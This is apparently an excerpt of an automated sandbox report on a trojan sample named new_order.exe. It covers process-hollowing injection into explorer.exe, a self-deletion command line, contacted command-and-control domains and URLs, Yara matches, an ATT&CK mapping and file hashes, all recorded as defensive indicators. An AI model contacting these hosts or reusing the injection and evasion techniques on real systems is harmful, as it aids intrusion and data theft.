          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0493D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0493D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0499FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0491AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0491AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0493FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_049052A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_049052A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_049052A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_049052A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_049052A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_049D0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_049D0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_049D0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_049846A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_049D8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04948EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04932ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_049BFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_049336CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_049316E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_049176E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04932AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0490AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0490AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04923A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0493A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0493A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0490C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0490C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0490C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04938E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04918A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_049BFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0490E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04994257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04909240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04909240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04909240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04909240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04917E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04917E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04917E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04917E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04917E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04917E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0492AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0492AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0492AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0492AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0492AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0494927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_049BB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_049BB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0491766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_049D8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0493B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04932397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04918794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04987794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04987794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04987794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_049C138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_049BD380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04911B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04911B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_049D5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04934BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04934BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04934BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_049853CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_049853CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_049437F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_049303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_049303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_049303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_049303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_049303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_049303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0492F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_049C131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0499FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0499FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_049D070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_049D070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0493A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0493A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0493E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04904F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04904F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_049D8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0490F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0490DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0491EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04933B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04933B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0490DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0491FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_049D8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new_order.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\explorer.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_0040ACE0 LdrLoadDll,

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Windows\explorer.exe | Domain query: www.royalfountainlogistics.com
          Source: C:\Windows\explorer.exe | Network Connect: 3.64.163.50 80
          Source: C:\Windows\explorer.exe | Domain query: www.bitherders.com
          Source: C:\Windows\explorer.exe | Network Connect: 34.102.136.180 80
          Source: C:\Users\user\Desktop\new_order.exe | Section unmapped: C:\Windows\SysWOW64\explorer.exe base address: 1160000
          Source: C:\Users\user\Desktop\new_order.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\new_order.exe | Section loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\new_order.exe | Section loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\new_order.exe | Memory written: C:\Users\user\Desktop\new_order.exe base: 400000 value starts with: 4D5A
          Source: C:\Users\user\Desktop\new_order.exe | Thread APC queued: target process: C:\Windows\explorer.exe
          Source: C:\Users\user\Desktop\new_order.exe | Thread register set: target process: 3424
          Source: C:\Windows\SysWOW64\explorer.exe | Thread register set: target process: 3424
          Source: C:\Users\user\Desktop\new_order.exe | Process created: C:\Users\user\Desktop\new_order.exe "C:\Users\user\Desktop\new_order.exe"
          Source: C:\Windows\SysWOW64\explorer.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\new_order.exe"
          Source: explorer.exe, 00000005.00000000.728348179.0000000000AD8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.709064422.0000000000AD8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.695157281.0000000000AD8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ProgmanMD6
          Source: explorer.exe, 00000005.00000000.710184984.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.728572990.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.695317494.0000000001080000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Program Manager
          Source: new_order.exe, 00000003.00000002.756328616.0000000002660000.00000040.10000000.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.710184984.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.728572990.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.717194149.0000000005E50000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.695317494.0000000001080000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000005.00000000.710184984.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.728572990.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.695317494.0000000001080000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
          Source: new_order.exe, 00000003.00000002.756328616.0000000002660000.00000040.10000000.00040000.00000000.sdmp | Binary or memory string: Microsoft-Reserved-24C26ACC-DE62-4303-88AD-6CD4F1447F18SecurityConfigureWindowsPasswordsProxy DesktopProgmanSoftware\Microsoft\Windows NT\CurrentVersion\WinlogonShellSoftware\Microsoft\Windows NT\CurrentVersion\Winlogon\AlternateShells\AvailableShells
          Source: explorer.exe, 00000005.00000000.710184984.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.728572990.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.695317494.0000000001080000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
          Source: explorer.exe, 00000005.00000000.701747574.000000000A716000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.720684965.000000000A716000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.736203145.000000000A716000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Shell_TrayWnd5D
          Source: C:\Users\user\Desktop\new_order.exe | Code function: 1_2_00405AA7 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,

          Stealing of Sensitive Information

          Source: Yara match | File source: 3.0.new_order.exe.400000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 3.0.new_order.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 3.0.new_order.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 3.2.new_order.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 3.0.new_order.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 3.2.new_order.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 3.0.new_order.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.2.new_order.exe.1acb0000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.2.new_order.exe.1acb0000.2.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000001.00000002.698671664.000000001ACB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000009.00000002.946218609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000009.00000002.946443311.0000000000820000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000000.738390030.000000000E954000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000003.00000002.754910561.00000000004C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000003.00000000.688696186.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000000.723911761.000000000E954000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000009.00000002.946503989.0000000000850000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000003.00000000.687734511.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000003.00000002.754825305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000003.00000002.755193140.00000000009F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          Source: Yara match | File source: 3.0.new_order.exe.400000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 3.0.new_order.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 3.0.new_order.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 3.2.new_order.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 3.0.new_order.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 3.2.new_order.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 3.0.new_order.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.2.new_order.exe.1acb0000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.2.new_order.exe.1acb0000.2.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000001.00000002.698671664.000000001ACB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000009.00000002.946218609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000009.00000002.946443311.0000000000820000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000000.738390030.000000000E954000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000003.00000002.754910561.00000000004C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000003.00000000.688696186.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000000.723911761.000000000E954000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000009.00000002.946503989.0000000000850000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000003.00000000.687734511.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000003.00000002.754825305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000003.00000002.755193140.00000000009F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          ATT&CK matrix, listed by tactic column (the digits in brackets before a technique name are the count badges shown beside it in the matrix):

          Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
          Execution: [11] Native API; [1] Shared Modules; At (Linux); At (Windows); Cron; Launchd; Scheduled Task
          Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items
          Privilege Escalation: [612] Process Injection; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items
          Defense Evasion: [1] Rootkit; [2] Virtualization/Sandbox Evasion; [612] Process Injection; [1] Deobfuscate/Decode Files or Information; [2] Obfuscated Files or Information; [1] Software Packing; [1] File Deletion
          Credential Access: [1] Credential API Hooking; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
          Discovery: [121] Security Software Discovery; [2] Virtualization/Sandbox Evasion; [2] Process Discovery; [1] Remote System Discovery; [2] File and Directory Discovery; [13] System Information Discovery; Network Sniffing
          Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
          Collection: [1] Credential API Hooking; [1] Archive Collected Data; [1] Clipboard Data; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
          Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
          Command and Control: [1] Encrypted Channel; [3] Ingress Tool Transfer; [3] Non-Application Layer Protocol; [13] Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port
          Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points
          Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
          Impact: [1] System Shutdown/Reboot; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact
          Behavior Graph (ID: 562020, Sample: new_order.exe, Start date: 28/01/2022, Architecture: WINDOWS, Score: 100)

          Start node
            DNS/IP: www.mydemosite0.com; mydemosite0.com
            Signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Malicious sample detected (through community Yara rule); 6 other signatures
            -> new_order.exe (19) started
                 Dropped file: C:\Users\user\AppData\Local\...\yvucmw.dll, PE32
                 Signatures: Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors); Tries to detect virtualization through RDTSC time measurements; Injects a PE file into a foreign processes
                 -> new_order.exe started
                      Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
                      -> explorer.exe injected
                           DNS/IP: www.bitherders.com 3.64.163.50, 49829, 80 AMAZON-02US United States; www.royalfountainlogistics.com; royalfountainlogistics.com 34.102.136.180, 49806, 80 GOOGLEUS United States
                           Signatures: System process connects to network (likely due to code injection or exploit)
                           -> explorer.exe started
                                Signatures: Self deletion via cmd delete; Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
                                -> cmd.exe (1) started
                                     -> conhost.exe started

          Source | Detection | Scanner | Label
          new_order.exe | 100% | Joe Sandbox ML |
          No Antivirus matches
          Source | Detection | Scanner | Label
          3.0.new_order.exe.400000.4.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          9.2.explorer.exe.1160000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
          9.2.explorer.exe.4e0f840.3.unpack | 100% | Avira | TR/Patched.Ren.Gen
          3.0.new_order.exe.400000.6.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          3.2.new_order.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          3.2.new_order.exe.2660000.3.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
          3.0.new_order.exe.400000.5.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          9.0.explorer.exe.1160000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
          1.2.new_order.exe.1acb0000.2.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          No Antivirus matches
          Source | Detection | Scanner | Label
          www.foodgw.com/os16/ | 100% | Avira URL Cloud | malware
          http://www.bitherders.com | 0% | Avira URL Cloud | safe
          http://www.bitherders.com/os16/?XL3pvD=wD4cT7q48NFnhCndHw9GtexQ1GWRT95jx29TDgoZhFSVm5lLt3bl1PAkaHfi4RiaXjL3&m0Dd=nFQHcLg0mfV8fj | 100% | Avira URL Cloud | malware
          http://www.royalfountainlogistics.com/os16/?XL3pvD=fPwrUrgVvuqeO931Dg4gzzbtrd7thr2/NsJ/u9TrNiEyg4FeGnR3RlXi6kvbgSn2o0yC&m0Dd=nFQHcLg0mfV8fj | 0% | Avira URL Cloud | safe
          http://www.bitherders.com/ | 0% | Avira URL Cloud | safe
          Name | IP | Active | Malicious | Reputation
          mydemosite0.com | 67.225.236.76 | true | true | unknown
          royalfountainlogistics.com | 34.102.136.180 | true | false | unknown
          www.bitherders.com | 3.64.163.50 | true | true | unknown
          www.royalfountainlogistics.com | unknown | unknown | true | unknown
          www.mydemosite0.com | unknown | unknown | true | unknown
          Name | Malicious | Antivirus Detection | Reputation
          www.foodgw.com/os16/ | true | Avira URL Cloud: malware | low
          http://www.bitherders.com/os16/?XL3pvD=wD4cT7q48NFnhCndHw9GtexQ1GWRT95jx29TDgoZhFSVm5lLt3bl1PAkaHfi4RiaXjL3&m0Dd=nFQHcLg0mfV8fj | true | Avira URL Cloud: malware | unknown
          http://www.royalfountainlogistics.com/os16/?XL3pvD=fPwrUrgVvuqeO931Dg4gzzbtrd7thr2/NsJ/u9TrNiEyg4FeGnR3RlXi6kvbgSn2o0yC&m0Dd=nFQHcLg0mfV8fj | false | Avira URL Cloud: safe | unknown
          Name | Source | Malicious | Antivirus Detection | Reputation
          http://www.bitherders.com | explorer.exe, 00000009.00000002.947761745.00000000052FF000.00000004.10000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          http://nsis.sf.net/NSIS_Error | new_order.exe | false | | high
          http://nsis.sf.net/NSIS_ErrorError | new_order.exe | false | | high
          http://www.bitherders.com/ | explorer.exe, 00000009.00000002.947761745.00000000052FF000.00000004.10000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          IP | Domain | Country | ASN | ASN Name | Malicious
          34.102.136.180 | royalfountainlogistics.com | United States | 15169 | GOOGLEUS | false
          3.64.163.50 | www.bitherders.com | United States | 16509 | AMAZON-02US | true
Joe Sandbox Version: 34.0.0 Boulder Opal
Analysis ID: 562020
Start date: 28.01.2022
Start time: 10:32:44
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 10m 51s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: new_order.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 21
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winEXE@7/4@3/2
EGA Information:
• Successful, ratio: 100%
HDC Information:
• Successful, ratio: 59.8% (good quality ratio 55.3%)
• Quality average: 72.5%
• Quality standard deviation: 30.9%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, WerFault.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
• Excluded IPs from analysis (whitelisted): 23.211.6.115
• Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, ocsp.digicert.com, store-images.s-microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
• Not all processes were analyzed; the report is missing behavior information
No simulations
No context
Process: C:\Users\user\Desktop\new_order.exe
File Type: data
Category: dropped
Size (bytes): 215627
Entropy (8bit): 7.992619646459695
Encrypted: true
SSDEEP: 6144:Zt0RpX6EopogjVRtFMZ1Y77rCTV3t4cEvc3:Zt0WEczRi1+CZtmc3
MD5: 921105E71769C2A776A5202EC57D500A
SHA1: 68C7C94675F4CE77F21E0AFDD453AACE4FD12A82
SHA-256: 879DFF0A694537357F3D62A3F065301481313A9215AC5B30ECBA651AEE285C5C
